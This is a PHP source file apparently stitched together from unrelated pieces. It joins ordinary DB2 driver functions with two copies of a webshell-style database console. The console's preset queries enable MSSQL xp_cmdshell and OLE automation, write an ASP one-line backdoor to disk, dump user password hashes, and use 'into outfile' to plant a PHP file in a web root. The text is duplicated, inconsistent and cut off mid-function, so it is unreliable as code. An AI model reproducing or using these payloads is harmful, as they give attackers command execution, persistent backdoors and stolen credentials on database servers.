function &FetchField($offset = -1)
{
$o = new ADOFieldObject();
$o->name = @db2_field_name($this->_queryID, $offset);
$o->type = @db2_field_type($this->_queryID, $offset);
$o->max_length = db2_field_width($this->_queryID, $offset);
if (ADODB_ASSOC_CASE == 0) {
$o->name = strtolower($o->name);
} else {
if (ADODB_ASSOC_CASE == 1) {
$o->name = strtoupper($o->name);
}
}
return $o;
}
/**
* Executes a prepared statement.
*
* @param array $params OPTIONAL Values to bind to parameter placeholders.
* @return bool
* @throws Zend_Db_Statement_Db2_Exception
*/
public function _execute(array $params = null)
{
if (!$this->_stmt) {
return false;
}
$retval = true;
if ($params !== null) {
$retval = @db2_execute($this->_stmt, $params);
} else {
$retval = @db2_execute($this->_stmt);
}
if ($retval === false) {
/**
* @see Zend_Db_Statement_Db2_Exception
*/
require_once PHP_LIBRARY_PATH . 'Zend/Db/Statement/Db2/Exception.php';
throw new Zend_Db_Statement_Db2_Exception(db2_stmt_errormsg(), db2_stmt_error());
}
$this->_keys = array();
if ($field_num = $this->columnCount()) {
for ($i = 0; $i < $field_num; $i++) {
$name = db2_field_name($this->_stmt, $i);
$this->_keys[] = $name;
}
}
$this->_values = array();
if ($this->_keys) {
$this->_values = array_fill(0, count($this->_keys), null);
}
return $retval;
}
/**
* Executes given SQL statement. We should use prepare / execute to allow the
* database server to reuse its access plan and increase the efficiency
* of your database access
*
* @param string $sql SQL statement
* @return resource Result resource identifier
* @access protected
*/
function _execute($sql)
{
// get result from db
$result = db2_exec($this->connection, $sql);
if (!is_bool($result)) {
// build table/column map for this result
$map = array();
$numFields = db2_num_fields($result);
$index = 0;
$j = 0;
$offset = 0;
while ($j < $numFields) {
$columnName = strtolower(db2_field_name($result, $j));
$tmp = strpos($sql, '.' . $columnName, $offset);
$tableName = substr($sql, $offset, $tmp - $offset);
$tableName = substr($tableName, strrpos($tableName, ' ') + 1);
$map[$index++] = array($tableName, $columnName);
$j++;
$offset = strpos($sql, ' ', $tmp);
}
$this->_resultMap[$result] = $map;
}
return $result;
}
function otherdb()
{
$db = isset($_GET['db']) ? $_GET['db'] : 'ms';
print <<<END
<form method="POST" name="dbform" id="dbform" action="?s=gg&db={$db}" enctype="multipart/form-data">
<div class="actall">
<a href="?s=gg&db=ms">   MSSQL  </a>
<a href="?s=gg&db=ora">   Oracle  </a>
<a href="?s=gg&db=ifx">   InforMix  </a>
<a href="?s=gg&db=fb">   FireBird  </a>
<a href="?s=gg&db=db2">  DB2  </a></div></form>
END;
if ($db == "ms") {
$mshost = isset($_POST['mshost']) ? $_POST['mshost'] : 'localhost';
$msuser = isset($_POST['msuser']) ? $_POST['msuser'] : '******';
$mspass = isset($_POST['mspass']) ? $_POST['mspass'] : '';
$msdbname = isset($_POST['msdbname']) ? $_POST['msdbname'] : 'master';
$msaction = isset($_POST['action']) ? $_POST['action'] : '';
$msquery = isset($_POST['mssql']) ? $_POST['mssql'] : '';
$msquery = stripslashes($msquery);
print <<<END
<div class="actall">
<form method="POST" name="msform" action="?s=gg&db=ms">
Host:<input type="text" name="mshost" value="{$mshost}" style="width:100px">
User:<input type="text" name="msuser" value="{$msuser}" style="width:100px">
Pass:<input type="text" name="mspass" value="{$mspass}" style="width:100px">
Dbname:<input type="text" name="msdbname" value="{$msdbname}" style="width:100px"><br>
<script language="javascript">
function msFull(i){
\tStr = new Array(11);
\tStr[0] = "";
\tStr[1] = "select @@version;";
\tStr[2] = "select name from sysdatabases;";
\tStr[3] = "select name from sysobject where type='U';";
\tStr[4] = "select name from syscolumns where id=Object_Id('table_name');";
\tStr[5] = "Use master dbcc addextendedproc ('sp_OACreate','odsole70.dll');";
\tStr[6] = "Use master dbcc addextendedproc ('xp_cmdshell','xplog70.dll');";
\tStr[7] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;";
\tStr[8] = "exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;";
\tStr[9] = "exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;";
\tStr[10] = "Exec master.dbo.xp_cmdshell 'net user';";
\tStr[11] = "Declare @s int;exec sp_oacreate 'wscript.shell',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo ^<%execute(request(char(35)))%^> > c:\\\\1.asp';";
\tStr[12] = "sp_makewebtask @outputfile='d:\\\\web\\\\bin.asp',@charset=gb2312,@query='select ''<%execute(request(chr(35)))%>''' ";
\tmsform.mssql.value = Str[i];
\treturn true;
}
</script>
<textarea name="mssql" style="width:600px;height:200px;">{$msquery}</textarea><br>
<select onchange="return msFull(options[selectedIndex].value)">
\t<option value="0" selected>ִ������</option>
\t<option value="1">��ʾ�汾</option>
\t<option value="2">���ݿ�</option>
\t<option value="3">����</option>
\t<option value="4">�ֶ�</option>
\t<option value="5">sp_oacreate</option>
\t<option value="6">xp_cmdshell</option>
\t<option value="7">xp_cmdshell(2005)</option>
\t<option value="8">sp_oacreate(2005)</option>
\t<option value="9">����openrowset(2005)</option>
\t<option value="10">xp_cmdshell exec</option>
\t<option value="10">sp_oamethod exec</option>
\t<option value="11">sp_makewebtask</option>
</select>
<input type="hidden" name="action" value="msquery">
<input class="bt" type="submit" value="Query"></form></div>
END;
if ($msaction == 'msquery') {
$msconn = mssql_connect($mshost, $msuser, $mspass);
mssql_select_db($msdbname, $msconn) or die("connect error :" . mssql_get_last_message());
$msresult = mssql_query($msquery) or die(mssql_get_last_message());
echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">' . "\n<tr>\n";
for ($i = 0; $i < mssql_num_fields($msresult); $i++) {
echo '<td><b>' . mssql_field_name($msresult, $i) . "</b></td>\n";
}
echo "</tr>\n";
mssql_data_seek($result, 0);
while ($msrow = mssql_fetch_row($msresult)) {
echo "<tr>\n";
for ($i = 0; $i < mssql_num_fields($msresult); $i++) {
echo '<td>' . "{$msrow[$i]}" . '</td>';
}
echo "</tr>\n";
}
echo "</table></font>";
mssql_free_result($msresult);
mssql_close();
}
} elseif ($db == "ora") {
$orahost = isset($_POST['orahost']) ? $_POST['orahost'] : 'localhost';
$oraport = isset($_POST['oraport']) ? $_POST['oraport'] : '1521';
$orauser = isset($_POST['orauser']) ? $_POST['orauser'] : '******';
$orapass = isset($_POST['orapass']) ? $_POST['orapass'] : '******';
$orasid = isset($_POST['orasid']) ? $_POST['orasid'] : 'ORCL';
$oraaction = isset($_POST['action']) ? $_POST['action'] : '';
$oraquery = isset($_POST['orasql']) ? $_POST['orasql'] : '';
$oraquery = stripslashes($oraquery);
print <<<END
<form method="POST" name="oraform" action="?s=gg&db=ora">
<div class="actall">
Host:<input type="text" name="orahost" value="{$orahost}" style="width:100px">
Port:<input type="text" name="oraport" value="{$oraport}" style="width:50px">
User:<input type="text" name="orauser" value="{$orauser}" style="width:80px">
Pass:<input type="text" name="orapass" value="{$orapass}" style="width:100px">
SID:<input type="text" name="orasid" value="{$orasid}" style="width:50px"><br>
<script language="javascript">
function oraFull(i){
Str = new Array(5);
\tStr[0] = "";
\tStr[1] = "select version();";
\tStr[2] = "SELECT NAME FROM V{$DATABASE}";
\tStr[3] = "select * From all_objects where object_type='TABLE'";
\tStr[4] = "select column_name from user_tab_columns where table_name='table1'";
\toraform.orasql.value = Str[i];
\treturn true;
}
</script>
<textarea name="orasql" style="width:600px;height:200px;">{$oraquery}</textarea><br>
<select onchange="return oraFull(options[selectedIndex].value)">
\t<option value="0" selected>ִ������</option>
\t<option value="1">��ʾ�汾</option>
\t<option value="2">���ݿ�</option>
\t<option value="3">����</option>
\t<option value="4">�ֶ�</option>
</select>
<input type="hidden" name="action" value="myquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
if ($oraaction == 'oraquery') {
$oralink = OCILogon($orauser, $orapass, "(DEscriptION=(ADDRESS=(PROTOCOL =TCP)(HOST={$orahost})(PORT = {$oraport}))(CONNECT_DATA =(SID={$orasid})))") or die(ocierror());
$oraresult = ociparse($oralink, $oraquery) or die(ocierror());
$orarow = oci_fetch_row($oraresult);
echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">' . "\n<tr>\n";
for ($i = 0; $i < oci_num_fields($oraresult); $i++) {
echo '<td><b>' . oci_field_name($oraresult, $i) . "</b></td>\n";
}
echo "</tr>\n";
ociresult($oraresult, 0);
while ($orarow = ora_fetch_row($oraresult)) {
echo "<tr>\n";
for ($i = 0; $i < ora_num_fields($result); $i++) {
echo '<td>' . "{$orarow[$i]}" . '</td>';
}
echo "</tr>\n";
}
echo "</table></font>";
oci_free_statement($oraresult);
ocilogoff();
}
} elseif ($db == "ifx") {
$ifxuser = isset($_POST['ifxuser']) ? $_POST['ifxuser'] : '******';
$ifxpass = isset($_POST['ifxpass']) ? $_POST['ifxpass'] : '******';
$ifxdbname = isset($_POST['ifxdbname']) ? $_POST['ifxdbname'] : 'ifxdb';
$ifxaction = isset($_POST['action']) ? $_POST['action'] : '';
$ifxquery = isset($_POST['ifxsql']) ? $_POST['ifxsql'] : '';
$ifxquery = stripslashes($ifxquery);
print <<<END
<form method="POST" name="ifxform" action="?s=gg&db=ifx">
<div class="actall">Dbname:<input type="text" name="ifxhost" value="{$ifxdbname}" style="width:100px">
User:<input type="text" name="ifxuser" value="{$ifxuser}" style="width:100px">
Pass:<input type="text" name="ifxpass" value="{$ifxpass}" style="width:100px"><br>
<script language="javascript">
function ifxFull(i){
Str = new Array(11);
\tStr[0] = "";
\tStr[1] = "select dbservername from sysobjects;";
\tStr[2] = "select name from sysdatabases;";
\tStr[3] = "select tabname from systables;";
\tStr[4] = "select colname from syscolumns where tabid=n;";
\tStr[5] = "select username,usertype,password from sysusers;";
\tifxform.ifxsql.value = Str[i];
\treturn true;
}
</script>
<textarea name="ifxsql" style="width:600px;height:200px;">{$ifxquery}</textarea><br>
<select onchange="return ifxFull(options[selectedIndex].value)">
\t<option value="0" selected>ִ������</option>
\t<option value="1">���ݿ�����������</option>
\t<option value="1">���ݿ�</option>
\t<option value="2">����</option>
\t<option value="3">�ֶ�</option>
\t<option value="4">hashes</option>
</select>
<input type="hidden" name="action" value="ifxquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
if ($ifxaction == 'ifxquery') {
$ifxlink = ifx_connect($ifcdbname, $ifxuser, $ifxpass) or die(ifx_errormsg());
$ifxresult = ifx_query($ifxquery, $ifxlink) or die(ifx_errormsg());
$ifxrow = ifx_fetch_row($ifxresult);
echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">' . "\n<tr>\n";
for ($i = 0; $i < ifx_num_fields($ifxresult); $i++) {
echo '<td><b>' . ifx_fieldproperties($ifxresult) . "</b></td>\n";
}
echo "</tr>\n";
mysql_data_seek($ifxresult, 0);
while ($ifxrow = ifx_fetch_row($ifxresult)) {
echo "<tr>\n";
for ($i = 0; $i < ifx_num_fields($ifxresult); $i++) {
echo '<td>' . "{$ifxrow[$i]}" . '</td>';
}
echo "</tr>\n";
}
echo "</table></font>";
ifx_free_result($ifxresult);
ifx_close();
}
} elseif ($db == "db2") {
$db2host = isset($_POST['db2host']) ? $_POST['db2host'] : 'localhost';
$db2port = isset($_POST['db2port']) ? $_POST['db2port'] : '50000';
$db2user = isset($_POST['db2user']) ? $_POST['db2user'] : '******';
$db2pass = isset($_POST['db2pass']) ? $_POST['db2pass'] : '******';
$db2dbname = isset($_POST['db2dbname']) ? $_POST['db2dbname'] : 'mysql';
$db2action = isset($_POST['action']) ? $_POST['action'] : '';
$db2query = isset($_POST['db2sql']) ? $_POST['db2sql'] : '';
$db2query = stripslashes($db2query);
print <<<END
<form method="POST" name="db2form" action="?s=gg&db=db2">
<div class="actall">Host:<input type="text" name="db2host" value="{$db2host}" style="width:100px">
Port:<input type="text" name="db2port" value="{$db2port}" style="width:60px">
User:<input type="text" name="db2user" value="{$db2user}" style="width:100px">
Pass:<input type="text" name="db2pass" value="{$db2pass}" style="width:100px">
Dbname:<input type="text" name="db2dbname" value="{$db2dbname}" style="width:100px"><br>
<script language="javascript">
function db2Full(i){
Str = new Array(4);
\tStr[0] = "";
\tStr[1] = "select schemaname from syscat.schemata;";
\tStr[2] = "select name from sysibm.systables;";
\tStr[3] = "select colname from syscat.columns where tabname='table_name';";
\tStr[4] = "db2 get db cfg for db_name;";
db2form.db2sql.value = Str[i];
return true;
}
</script>
<textarea name="db2sql" style="width:600px;height:200px;">{$db2query}</textarea><br>
<select onchange="return db2Full(options[selectedIndex].value)">
\t<option value="0" selected>ִ������</option>
\t<option value="1">���ݿ�</option>
\t<option value="1">����</option>
\t<option value="2">�ֶ�</option>
\t<option value="3">���ݿ�����</option>
</select>
<input type="hidden" name="action" value="db2query">
<input class="bt" type="submit" value="Query"></div></form>
END;
if ($myaction == 'db2query') {
$db2link = db2_connect($db2dbname, $db2user, $db2pass) or die(db2_conn_errormsg());
$db2result = db2_exec($db2link, $db2query) or die(db2_stmt_errormsg());
$db2row = db2_fetch_row($db2result);
echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">' . "\n<tr>\n";
for ($i = 0; $i < db2_num_fields($db2result); $i++) {
echo '<td><b>' . db2_field_name($db2result) . "</b></td>\n";
}
echo "</tr>\n";
while ($db2row = db2_fetch_row($db2result)) {
echo "<tr>\n";
for ($i = 0; $i < db2_num_fields($db2result); $i++) {
echo '<td>' . "{$db2row[$i]}" . '</td>';
}
echo "</tr>\n";
}
echo "</table></font>";
db2_free_result($db2result);
db2_close();
}
} elseif ($db == "fb") {
$fbhost = isset($_POST['fbhost']) ? $_POST['fbhost'] : 'localhost';
$fbpath = isset($_POST['fbpath']) ? $_POST['fbpath'] : '';
$fbpath = str_replace("\\\\", "\\", $fbpath);
$fbuser = isset($_POST['fbuser']) ? $_POST['fbuser'] : '******';
$fbpass = isset($_POST['fbpass']) ? $_POST['fbpass'] : '******';
$fbaction = isset($_POST['action']) ? $_POST['action'] : '';
$fbquery = isset($_POST['fbsql']) ? $_POST['fbsql'] : '';
$fbquery = stripslashes($fbquery);
print <<<END
<form method="POST" name="fbform" action="?s=gg&db=fb">
<div class="actall">Host:<input type="text" name="fbhost" value="{$fbhost}" style="width:100px">
Path:<input type="text" name="fbpath" value="{$fbpath}" style="width:100px">
User:<input type="text" name="fbuser" value="{$fbuser}" style="width:100px">
Pass:<input type="text" name="fbpass" value="{$fbpass}" style="width:100px"><br/>
<script language="javascript">
function fbFull(i){
Str = new Array(5);
\tStr[0] = "";
\tStr[1] = "select RDB\$RELATION_NAME from RDB\$RELATIONS;";
\tStr[2] = "select RDB\$FIELD_NAME from RDB\$RELATION_FIELDS where RDB\$RELATION_NAME='table_name';";
\tStr[3] = "input 'D:\\createtable.sql';";
\tStr[4] = "shell netstat -an;";
fbform.fbsql.value = Str[i];
return true;
}
</script>
<textarea name="fbsql" style="width:600px;height:200px;">{$fbquery}</textarea><br>
<select onchange="return fbFull(options[selectedIndex].value)">
\t<option value="0" selected>ִ������</option>
\t<option value="1">����</option>
\t<option value="2">�ֶ�</option>
\t<option value="3">����sql</option>
\t<option value="4">shell</option>
</select>
<input type="hidden" name="action" value="fbquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
if ($fbaction == 'fbquery') {
$fblink = ibase_connect($fbhost . ':' . $fbpath, $fbuser, $fbpass) or die(ibase_errmsg());
$fbresult = ibase_query($fblink, $fbquery) or die(ibase_errmsg());
echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">' . "\n<tr>\n";
for ($i = 0; $i < ibase_num_fields($fbresult); $i++) {
echo '<td><b>' . ibase_field_info($fbresult, $i) . "</b></td>\n";
}
echo "</tr>\n";
ibase_field_info($fbresult, 0);
while ($fbrow = ibase_fetch_row($fbresult)) {
echo "<tr>\n";
for ($i = 0; $i < ibase_num_fields($fbresult); $i++) {
echo '<td>' . "{$fbrow[$i]}" . '</td>';
}
echo "</tr>\n";
}
echo "</table></font>";
ibase_free_result($fbresult);
ibase_close();
}
}
}
/**
* Returns the nth column name
* @param $res Object: statement resource
* @param $n Integer: Index of field or column
* @return String name of nth column
*/
public function fieldName($res, $n)
{
if ($res instanceof ResultWrapper) {
$res = $res->result;
}
if ($res instanceof IBM_DB2Result) {
$res = $res->getResult();
}
return db2_field_name($res, $n);
}
/**
* Executes a prepared statement.
*
* @param array $params OPTIONAL Values to bind to parameter placeholders.
* @return bool
* @throws \Zend\Db\Statement\Db2Exception
*/
public function _execute(array $params = null)
{
if (!$this->_stmt) {
return false;
}
$retval = true;
if ($params !== null) {
$retval = @db2_execute($this->_stmt, $params);
} else {
$retval = @db2_execute($this->_stmt);
}
if ($retval === false) {
throw new Db2Exception(db2_stmt_errormsg(), db2_stmt_error());
}
$this->_keys = array();
if ($field_num = $this->columnCount()) {
for ($i = 0; $i < $field_num; $i++) {
$name = db2_field_name($this->_stmt, $i);
$this->_keys[] = $name;
}
}
$this->_values = array();
if ($this->_keys) {
$this->_values = array_fill(0, count($this->_keys), null);
}
return $retval;
}
public function getFieldsArray($result, $make_lower_case = false)
{
if (!isset($result) || empty($result)) {
return 0;
}
$field_array = array();
$count = db2_num_fields($result);
for ($i = 0; $i < $count; $i++) {
$meta = db2_field_name($result, $i);
if (!$meta) {
return array();
}
$field_array[] = $make_lower_case ? strtolower($meta) : $meta;
}
return $field_array;
}
/**
* Executes a prepared statement.
*
* @param array $params
* @return void
* @throws Zend_Db_Statement_Db2_Exception
*/
public function execute(array $params = array())
{
if (!$this->_stmt) {
$connection = $this->_connection->getConnection();
$sql = $this->_joinSql();
$this->_stmt = db2_prepare($connection, $sql);
}
if (!$this->_stmt) {
require_once 'Zend/Db/Statement/Db2/Exception.php';
throw new Zend_Db_Statement_Db2_Exception(db2_conn_errormsg($connection), db2_conn_error($connection));
}
$success = db2_execute($this->_stmt, $params);
if (!$success) {
require_once 'Zend/Db/Statement/Db2/Exception.php';
throw new Zend_Db_Statement_Db2_Exception(db2_stmt_errormsg($this->_stmt), db2_stmt_error($this->_stmt));
}
$this->_keys = array();
if ($field_num = $this->columnCount()) {
for ($i = 0; $i < $field_num; $i++) {
$name = db2_field_name($this->_stmt, $i);
$this->_keys[] = $name;
}
}
$this->_values = array();
if ($this->_keys) {
$this->_values = array_fill(0, count($this->_keys), null);
}
}
public static function getColumnMeta($index, $sql)
{
if ($sql && $index >= 0) {
$newmeta = array();
$newmeta["name"] = db2_field_name($sql, $index);
$newmeta["native_type"] = db2_field_type($sql, $index);
$newmeta["len"] = db2_field_width($sql, $index);
return $newmeta;
}
return false;
}
function otherdb()
{
$db = isset($_GET['db']) ? $_GET['db'] : '';
print <<<END
<form method="POST" name="dbform" id="dbform" action="?s=w&db={$db}" enctype="multipart/form-data">
<div class="actall"><a href="?s=w">   psotgresql  </a>
<a href="?s=w&db=ms">   mssql  </a>
<a href="?s=w&db=ora">   oracle  </a>
<a href="?s=w&db=ifx">   informix  </a>
<a href="?s=w&db=fb">   firebird  </a>
<a href="?s=w&db=db2">  db2  </a></div></form>
END;
if ($db == "ms") {
$mshost = isset($_POST['mshost']) ? $_POST['mshost'] : 'localhost';
$msuser = isset($_POST['msuser']) ? $_POST['msuser'] : '******';
$mspass = isset($_POST['mspass']) ? $_POST['mspass'] : '******';
$msdbname = isset($_POST['msdbname']) ? $_POST['msdbname'] : 'master';
$msaction = isset($_POST['action']) ? $_POST['action'] : '';
$msquery = isset($_POST['mssql']) ? $_POST['mssql'] : '';
$msquery = stripslashes($msquery);
print <<<END
<form method="POST" name="msform" action="?s=w&db=ms">
<div class="actall">Host:<input type="text" name="mshost" value="{$mshost}" style="width:100px">
User:<input type="text" name="msuser" value="{$msuser}" style="width:100px">
Pass:<input type="text" name="mspass" value="{$mspass}" style="width:100px">
Dbname:<input type="text" name="msdbname" value="{$msdbname}" style="width:100px"><br><br>
<script language="javascript">
function msFull(i){
\tStr = new Array(11);
Str[0] = "";
\tStr[1] = "select @@version;";
Str[2] = "select name from sysdatabases;";
Str[3] = "select name from sysobject where type='U';";
Str[4] = "select name from syscolumns where id=Object_Id('table_name');";
Str[5] = "Use master dbcc addextendedproc ('sp_OACreate','odsole70.dll');";
\tStr[6] = "Use master dbcc addextendedproc ('xp_cmdshell','xplog70.dll');";
\tStr[7] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;";
Str[8] = "exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;";
Str[9] = "exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;";
Str[10] = "Exec master.dbo.xp_cmdshell 'net user';";
Str[11] = "Declare @s int;exec sp_oacreate 'wscript.shell',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo ^<%execute(request(char(35)))%^> > c:\\\\1.asp';";
\tStr[12] = "sp_makewebtask @outputfile='d:\\\\web\\\\bin.asp',@charset=gb2312,@query='select ''<%execute(request(chr(35)))%>''' ";
msform.mssql.value = Str[i];
\treturn true;
}
</script>
<textarea name="mssql" style="width:600px;height:200px;">{$msquery}</textarea><br>
<select onchange="return msFull(options[selectedIndex].value)">
\t<option value="0" selected>command</option>
<option value="1">version</option>
<option value="2">databases</option>
<option value="3">tables</option>
<option value="4">columns</option>
<option value="5">add sp_oacreate</option>
\t<option value="6">add xp_cmdshell</option>
\t<option value="7">add xp_cmdshell(2005)</option>
<option value="8">add sp_oacreate(2005)</option>
<option value="9">open openrowset(2005)</option>
<option value="10">xp_cmdshell exec</option>
<option value="10">sp_oamethod exec</option>
<option value="11">sp_makewebtask</option>
</select>
<input type="hidden" name="action" value="msquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
if ($msaction == 'msquery') {
$msconn = mssql_connect($mshost, $msuser, $mspass);
mssql_select_db($msdbname, $msconn) or die("connect error :" . mssql_get_last_message());
$msresult = mssql_query($msquery) or die(mssql_get_last_message());
echo '<font face="verdana">';
echo '<table border="1" cellpadding="1" cellspacing="2">';
echo "\n<tr>\n";
for ($i = 0; $i < mssql_num_fields($msresult); $i++) {
echo '<td bgcolor="#228B22"><b>' . mssql_field_name($msresult, $i);
echo "</b></td>\n";
}
echo "</tr>\n";
mssql_data_seek($result, 0);
while ($msrow = mssql_fetch_row($msresult)) {
echo "<tr>\n";
for ($i = 0; $i < mssql_num_fields($msresult); $i++) {
echo '<td bgcolor="#B8B8E8">';
echo "{$msrow[$i]}";
echo '</td>';
}
echo "</tr>\n";
}
echo "</table>\n";
echo "</font>";
mssql_free_result($msresult);
mssql_close();
}
} elseif ($db == "ora") {
$orahost = isset($_POST['orahost']) ? $_POST['orahost'] : 'localhost';
$oraport = isset($_POST['oraport']) ? $_POST['oraport'] : '1521';
$orauser = isset($_POST['orauser']) ? $_POST['orauser'] : '******';
$orapass = isset($_POST['orapass']) ? $_POST['orapass'] : '******';
$orasid = isset($_POST['orasid']) ? $_POST['orasid'] : 'ORCL';
$oraaction = isset($_POST['action']) ? $_POST['action'] : '';
$oraquery = isset($_POST['orasql']) ? $_POST['orasql'] : '';
$oraquery = stripslashes($oraquery);
print <<<END
<form method="POST" name="oraform" action="?s=w&db=ora">
<div class="actall">Host:<input type="text" name="orahost" value="{$orahost}" style="width:100px">
Port:<input type="text" name="oraport" value="{$oraport}" style="width:50px">
User:<input type="text" name="orauser" value="{$orauser}" style="width:80px">
Pass:<input type="text" name="orapass" value="{$orapass}" style="width:100px">
SID:<input type="text" name="orasid" value="{$orasid}" style="width:50px"><br><br>
<script language="javascript">
function oraFull(i){
\tStr = new Array(8);
Str[0] = "";
\tStr[1] = "select version();";
Str[2] = "show databases;";
Str[3] = "show tables from db_name;";
Str[4] = "show columns from table_name;";
Str[5] = "select user,password from mysql.user;";
\tStr[6] = "select load_file(0xxxxxxxxxxxxxxxxxxxxx);";
\tStr[7] = "select 0xxxxx from mysql.user into outfile 'c:\\\\inetpub\\\\wwwroot\\\\test.php'";
\toraform.orasql.value = Str[i];
\treturn true;
}
</script>
<textarea name="orasql" style="width:600px;height:200px;">{$oraquery}</textarea><br>
<select onchange="return oraFull(options[selectedIndex].value)">
\t<option value="0" selected>command</option>
<option value="1">version</option>
<option value="2">databases</option>
<option value="3">tables</option>
<option value="4">columns</option>
<option value="5">hashes</option>
\t<option value="6">load_file</option>
\t<option value="7">into outfile</option>
</select>
<input type="hidden" name="action" value="myquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
if ($oraaction == 'oraquery') {
$oralink = OCILogon($orauser, $orapass, "(DEscriptION=(ADDRESS=(PROTOCOL =TCP)(HOST={$orahost})(PORT = {$oraport}))(CONNECT_DATA =(SID={$orasid})))") or die(ocierror());
$oraresult = ociparse($oralink, $oraquery) or die(ocierror());
$orarow = oci_fetch_row($oraresult);
echo '<font face="verdana">';
echo '<table border="1" cellpadding="1" cellspacing="2">';
echo "\n<tr>\n";
for ($i = 0; $i < oci_num_fields($oraresult); $i++) {
echo '<td bgcolor="#228B22"><b>' . oci_field_name($oraresult, $i);
echo "</b></td>\n";
}
echo "</tr>\n";
ociresult($oraresult, 0);
while ($orarow = ora_fetch_row($oraresult)) {
echo "<tr>\n";
for ($i = 0; $i < ora_num_fields($result); $i++) {
echo '<td bgcolor="#B8B8E8">';
echo "{$orarow[$i]}";
echo '</td>';
}
echo "</tr>\n";
}
echo "</table>\n";
echo "</font>";
oci_free_statement($oraresult);
ocilogoff();
}
} elseif ($db == "ifx") {
$ifxuser = isset($_POST['ifxuser']) ? $_POST['ifxuser'] : '******';
$ifxpass = isset($_POST['ifxpass']) ? $_POST['ifxpass'] : '******';
$ifxdbname = isset($_POST['ifxdbname']) ? $_POST['ifxdbname'] : 'ifxdb';
$ifxaction = isset($_POST['action']) ? $_POST['action'] : '';
$ifxquery = isset($_POST['ifxsql']) ? $_POST['ifxsql'] : '';
$ifxquery = stripslashes($ifxquery);
print <<<END
<form method="POST" name="ifxform" action="?s=w&db=ifx">
<div class="actall">Dbname:<input type="text" name="ifxhost" value="{$ifxdbname}" style="width:100px">
User:<input type="text" name="ifxuser" value="{$ifxuser}" style="width:100px">
Pass:<input type="text" name="ifxpass" value="{$ifxpass}" style="width:100px"><br><br>
<script language="javascript">
function ifxFull(i){
\tStr = new Array(11);
Str[0] = "";
\tStr[1] = "select dbservername from sysobjects;";
Str[2] = "select name from sysdatabases;";
Str[3] = "select tabname from systables;";
Str[4] = "select colname from syscolumns where tabid=n;";
Str[5] = "select username,usertype,password from sysusers;";
\tifxform.ifxsql.value = Str[i];
\treturn true;
}
</script>
<textarea name="ifxsql" style="width:600px;height:200px;">{$ifxquery}</textarea><br>
<select onchange="return ifxFull(options[selectedIndex].value)">
\t<option value="0" selected>command</option>
<option value="1">dbservername</option>
<option value="1">databases</option>
<option value="2">tables</option>
<option value="3">columns</option>
<option value="4">hashes</option>
</select>
<input type="hidden" name="action" value="ifxquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
if ($ifxaction == 'ifxquery') {
$ifxlink = ifx_connect($ifcdbname, $ifxuser, $ifxpass) or die(ifx_errormsg());
$ifxresult = ifx_query($ifxquery, $ifxlink) or die(ifx_errormsg());
$ifxrow = ifx_fetch_row($ifxresult);
echo '<font face="verdana">';
echo '<table border="1" cellpadding="1" cellspacing="2">';
echo "\n<tr>\n";
for ($i = 0; $i < ifx_num_fields($ifxresult); $i++) {
echo '<td bgcolor="#228B22"><b>' . ifx_fieldproperties($ifxresult);
echo "</b></td>\n";
}
echo "</tr>\n";
mysql_data_seek($ifxresult, 0);
while ($ifxrow = ifx_fetch_row($ifxresult)) {
echo "<tr>\n";
for ($i = 0; $i < ifx_num_fields($ifxresult); $i++) {
echo '<td bgcolor="#B8B8E8">';
echo "{$ifxrow[$i]}";
echo '</td>';
}
echo "</tr>\n";
}
echo "</table>\n";
echo "</font>";
ifx_free_result($ifxresult);
ifx_close();
}
} elseif ($db == "db2") {
$db2host = isset($_POST['db2host']) ? $_POST['db2host'] : 'localhost';
$db2port = isset($_POST['db2port']) ? $_POST['db2port'] : '50000';
$db2user = isset($_POST['db2user']) ? $_POST['db2user'] : '******';
$db2pass = isset($_POST['db2pass']) ? $_POST['db2pass'] : '******';
$db2dbname = isset($_POST['db2dbname']) ? $_POST['db2dbname'] : 'mysql';
$db2action = isset($_POST['action']) ? $_POST['action'] : '';
$db2query = isset($_POST['db2sql']) ? $_POST['db2sql'] : '';
$db2query = stripslashes($db2query);
print <<<END
<form method="POST" name="db2form" action="?s=w&db=db2">
<div class="actall">Host:<input type="text" name="db2host" value="{$db2host}" style="width:100px">
Port:<input type="text" name="db2port" value="{$db2port}" style="width:60px">
User:<input type="text" name="db2user" value="{$db2user}" style="width:100px">
Pass:<input type="text" name="db2pass" value="{$db2pass}" style="width:100px">
Dbname:<input type="text" name="db2dbname" value="{$db2dbname}" style="width:100px"><br><br>
<script language="javascript">
function db2Full(i){
\tStr = new Array(4);
Str[0] = "";
\tStr[1] = "select schemaname from syscat.schemata;";
Str[2] = "select name from sysibm.systables;";
Str[3] = "select colname from syscat.columns where tabname='table_name';";
Str[4] = "db2 get db cfg for db_name;";
\tdb2form.db2sql.value = Str[i];
\treturn true;
}
</script>
<textarea name="db2sql" style="width:600px;height:200px;">{$db2query}</textarea><br>
<select onchange="return db2Full(options[selectedIndex].value)">
\t<option value="0" selected>command</option>
<option value="1">databases</option>
<option value="1">tables</option>
<option value="2">columns</option>
<option value="3">db config</option>
</select>
<input type="hidden" name="action" value="db2query">
<input class="bt" type="submit" value="Query"></div></form>
END;
if ($myaction == 'db2query') {
